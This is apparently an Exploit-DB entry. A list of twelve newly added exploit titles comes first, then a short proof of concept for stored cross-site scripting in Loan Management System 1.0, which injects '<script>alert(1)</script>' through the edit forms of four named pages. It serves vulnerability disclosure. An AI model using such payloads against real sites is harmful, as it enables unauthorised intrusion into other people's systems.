5aa3bfc759
12 changes to exploits/shellcodes Comtrend AR-5387un router - Persistent XSS (Authenticated) Loan Management System 1.0 - Multiple Cross Site Scripting (Stored) Wordpress Plugin WP Courses < 2.0.29 - Broken Access Controls leading to Courses Content Disclosure Visitor Management System in PHP 1.0 - SQL Injection (Authenticated) Ultimate Project Manager CRM PRO Version 2.0.5 - SQLi (Authenticated) WordPress Plugin HS Brand Logo Slider 2.1 - 'logoupload' File Upload User Registration & Login and User Management System With admin panel 2.1 - Persistent XSS RiteCMS 2.2.1 - Remote Code Execution (Authenticated) Mobile Shop System v1.0 - SQL Injection Authentication Bypass Apache Struts 2 - DefaultActionMapper Prefixes OGNL Code Execution WordPress Plugin Rest Google Maps < 7.11.18 - SQL Injection WordPress Plugin Colorbox Lightbox v1.1.1 - Persistent Cross-Site Scripting (Authenticated)
22 lines
No EOL
831 B
Text
22 lines
No EOL
831 B
Text
# Exploit Title: Loan Management System 1.0 - Multiple Cross Site Scripting (Stored)
|
||
# Google Dork: N/A
|
||
# Date: 2020/10/19
|
||
# Exploit Author: Akıner Kısa
|
||
# Vendor Homepage: https://www.sourcecodester.com/php/14471/loan-management-system-using-phpmysql-source-code.html
|
||
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/loan-management-system-using-php.zip
|
||
# Version: 1.0
|
||
# Tested on: XAMPP
|
||
# CVE : N/A
|
||
|
||
Vulnerable Pages:
|
||
|
||
http://localhost/loan/index.php?page=loans
|
||
http://localhost/loan/index.php?page=payments
|
||
http://localhost/loan/index.php?page=borrowers
|
||
http://localhost/loan/index.php?page=loan_type
|
||
|
||
Proof of Concept:
|
||
|
||
1 - Go to vulnerable pages and using edit button (in the right, action column).
|
||
|
||
2 - And fill the blanks with "<script>alert(1)</script>" payload. |